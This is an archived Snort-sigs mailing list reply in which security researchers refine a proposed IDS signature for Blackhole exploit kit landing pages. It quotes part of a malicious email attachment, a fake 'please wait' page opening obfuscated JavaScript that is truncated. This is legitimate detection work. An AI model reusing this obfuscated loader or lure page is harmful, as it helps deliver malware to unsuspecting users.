Snort mailing list archives
Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq"
From: Matt Olney <molney () sourcefire com>
Date: Thu, 1 Mar 2012 09:45:47 -0500
Nathan, Got an email entitled: Fwd: Your Flight N 91-17249698 It had an attached html file with the following html (recognize it? :)) <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " http://www.w3.org/TR/html4/loose.dtd";> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> *<title>Please wait untill the page loads...</title>* </head> <body> <h1>Please Wait... Loading... </h1><br> </body>` <script>if(window['doc'+'ume'+'nt'])aa=/\w/.exec(1).index+[];aaa='0';try{new locat*ion();}catch(qqq){ss*=String;if(aa Etc... Good rule :) Matt On Wed, Feb 29, 2012 at 4:35 PM, Community Signatures <lists () packetmail net>wrote:
On 02/29/12 15:19, Matt Olney wrote:Since you're associating with an exploit kit, rather than an active trojan, and given that exploits are typically aimed at user applications, I'd use classtype:attempted-user;Understood, on the ET side we tend to use trojan-activity because the point of the exploit kit is to install a trojan/malware. I always viewed attempted-user as privilege escalation. I may just leave classtype off and let VRT apply this and the metadata as they feel fit.Because it is a file, and you're not using any http_inspect buffers, we'd use $FILE_DATA_PORTS in case it is delivered via mail (saw one like that yesterday).Thanks Matt, can you elaborate more on this as I've not seen this behavior before, where Blackhole is delivered via mail. I have seen mailing campaigns that include a link which, upon landing, is Blackhole. I don't disagree with your changes over $HTTP_PORTS but I have not seen this behavior especially with SMTPDsAgain, primarily cosmetic changes, and does nothing, in this simple case, to modify the functionality of the rule.Thank you for taking the time to explain the changes and current convention. Thanks, Nathan
------------------------------------------------------------------------------ Virtualization & Cloud Management Using Capacity Planning Cloud computing makes use of virtualization - but cloud computing also focuses on allowing computing to be delivered as a service. http://www.accelacomm.com/jaw/sfnl/114/51521223/
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq" Community Proposed (Feb 29)
- Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq" Matt Olney (Feb 29)
- Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq" Community Signatures (Feb 29)
- Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq" Joel Esler (Feb 29)
- Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq" Matt Olney (Mar 01)
- Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq" Community Signatures (Feb 29)
- Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq" Matt Olney (Feb 29)